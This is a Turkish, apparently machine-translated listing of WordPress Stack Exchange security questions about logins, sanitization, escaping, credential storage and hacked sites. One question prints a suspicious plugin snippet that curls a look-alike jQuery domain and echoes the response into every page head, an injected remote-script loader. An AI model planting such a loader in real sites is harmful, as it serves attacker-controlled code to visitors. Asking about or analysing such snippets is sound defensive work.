«security» etiketlenmiş sorular

Kapalı. Bu soru konu dışı . Şu anda cevapları kabul etmiyor. Bu soruyu geliştirmek ister misiniz? Sorunuzu güncelleyin o yüzden -konu üzerinde WordPress Geliştirme Stack Exchange için. 4 yıl önce kapalı . Eklenti Basit Giriş Kilidi'ni yükledim ve birkaç gün önce veritabanı günde 200'den fazla kayıt kaydediyor. Sitemin bu kadar …

20 login  security 

Son zamanlarda saldırıya uğrayan bir müşterim vardı ve sitesinde  ve Æ gibi garip karakterler olduğunu fark ettim. Bilgisayar korsanlarının wp_optionsveritabanındaki tabloda blog_charset değerini UTF-7 olarak değiştirdiği ortaya çıktı . UTF-8'e geri ayarladım, ancak UTF-7'ye ayarlandığı süre boyunca bunun herhangi bir güvenlik açığı yaratabileceğini merak ediyordum. Biraz arama yaptım ve …

19 security  encoding  hacked  characters 

WordPress'te yeniyim. Son zamanlarda bilgisayar korsanlarının eklentilerdeki güvenlik açıklarından nasıl yararlanabileceği hakkında bir makale okudum. Google Pagespeed gibi çeşitli kaynaklar da eklentileri kullanmamı ya da en azından minimumda tutmamı sağladı. Şahsen, eklentilerden kaçınmaya çalışıyorum çünkü sitemde neler olduğunu daha fazla kontrol ediyorum ve birini indirmek neredeyse 'Harika, nasıl kullanılacağını öğrenmek …

19 plugins  security 

Şu anda bir eklenti geliştiriyorum ve muhtemelen diğer eklenti kullanabilirsiniz böylece eklenti deposunda muhtemelen daha fazla serbest bırakma şansı vardır. Eklenti bir API kullanıyor olacak ve bu API'yı kullanmak için bir kullanıcı adı ve şifre geçmeniz gerekiyor. Eklentimin bu giriş bilgilerini veritabanında saklaması gerekiyor. API bunları düz metinde gerektirse de …

19 plugin-development  security  api  encryption 

Bunu bir eklentide buldum. Bu ne işe yarıyor? Bu tehlikeli mi? add_action('admin_enqueue_scripts', 'pw_load_scripts'); if (!function_exists('wp__head'){ function wp__head() { if(function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1"); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10); $jquery = curl_exec($ch); curl_close($ch); echo "$jquery"; } } add_action('wp_head', 'wp__head'); }

17 plugins  wp-admin  security  curl 

Eklentilerim / temalarımdaki tüm verilerin veritabanına girmeden önce ve tarayıcıya çıkmadan önce güvenli bir şekilde işlendiğinden emin olmak istiyorum. Benim sorunum, API'nın sizin için - saniyeler sonrası meta alanlarını kaydederken - ve eklenti / tema yazarının bunu yapmaktan tamamen sorumlu olduğu diğerleri için - sanitizasyonu işlediği durumlar olduğu - özel …

17 plugin-development  security  customization  validation  sanitization 

Wordpress'in yeni sürümlerinde koruma wp-admin/install.phpve wp-admin/install-helper.phpgüvenlik sızıntısı var mı? Varsayılan olarak bu dosyalardaki dosya izni 644'tür. Herhangi bir sızıntı varsa, lütfen ne tür?

16 security  installation 

Şu anda olduğu gibi, bu soru Soru-Cevap formatımıza uygun değil. Yanıtların gerçekler, referanslar veya uzmanlık tarafından desteklenmesini bekliyoruz, ancak bu soru muhtemelen tartışma, tartışma, oylama veya genişletilmiş tartışma talep edecektir. Bu sorunun çözülebileceğini ve muhtemelen yeniden açılabileceğini düşünüyorsanız, yardım için yardım merkezini ziyaret edin . 7 yıl önce kapalı . …

16 plugins  plugin-development  security  sql 

Medya yükleyicide SVG'lerin varsayılan olarak engellendiğini görüyorum ve bunu function.php dosyasında desteklenen bir MIME türü olarak eklemeniz gerekiyor. Bunun arkasında hangi güvenlik nedenleri var?

15 media  security  svg 

Ben kod bakmak vardı ama the_title the_content the_excerptvb gibi işlevlerde herhangi bir kaçan göremiyordum . Ben doğru okuma olmayabilir. Tema geliştirme bu işlevleri gibi kaçmak gerekir: esc_html ( the_title () ) Düzenleme: Yukarıdaki kodun cevaplarında belirtildiği gibi, ne olursa olsun yanlış - kod okumuş olmalı esc_html ( get_the_title () )

15 security  escaping 

Harici bir geliştiriciyle ilgili bazı sorunlar yaşıyoruz. wp-adminSiteye erişimi yalnızca dahili erişimle ( VPN üzerinden ) sınırlamak istiyoruz . Basitçe, dış kullanıcılar tarafından saldırıya uğramayacak. Yöneticileri siteden numaralandırabilir ve kimlik avı yapılmasını istemeyiz. Geliştiricimiz bunu yapamayacağımızı söylüyor çünkü sitenin harici olarak erişilebilir olması için sayfanın çalışması gerekir. özellikle admin-ajaxsayfa. Sayfa …

14 admin  ajax  security 

Güvenlik konusunda biraz yardımcı olabilecek kısa bir soru. Ben readme.html dosyasında listelenen sürüm numarası olduğunu fark ettim. Her yükseltme işleminden sonra yeniden görünür ve licence.txt ve wp-config-sample.php dosyalarında da görünür. Yükseltmeden sonra WordPress'in bu dosyaları otomatik olarak kaldırmasının kolay bir yolu var mı? Sürüm numarasının meta etiketler, rss yayınları, atom …

13 security  wp-config 

WordPress'i uygulama içinde güncellenecek şekilde yapılandırmak (yani WordPress) rahatlığı nedeniyle benim için idealdir. Yine de, gereksinimlerden rahatsız oluyorum. Php için ssh2 yüklendikten sonra gösterilen istenen alanlar sadece ortak anahtarımı değil, aynı zamanda özel anahtarımı da soruyor. En fazla sadece ortak anahtarın gerekli olacağını düşünürdüm. WordPress, sunucuma doğru yazılım paketini yükleyebilmesi …

13 security  updates  ssh 

Wp_insert_post () için Codex'a bakıldığında, bu fonksiyonun "... değişkenleri temizlediğini , bazı kontroller yaptığını, tarih / saat gibi eksik değişkenleri doldurduğunu" belirtti (EDIT: Codex girişini daha sağlam bir örnek içerecek şekilde güncelledim güvenlik yanı sıra meta ve kategori ataması da dahil) Sadece XSS hack'lerini ve benzerlerini önlemek için daha fazla …

13 security  sanitization 

Bu şey kodumu zorlaştırıyor. Wordpress kodeksi, güvenlik hakkında belirsiz bir şekilde konuşarak esc_url kullanılmasına neden olur. Ama gerçekten zahmete değer mi? Örneğin, aşağıdakileri kullanarak önemli, pratik güvenlik avantajı nedir? <?php echo esc_url( home_url( '/' ) ); ?> onun yerine <?php echo home_url() ?> Not: Tema geliştirme hakkında değil, belirli bir …

12 security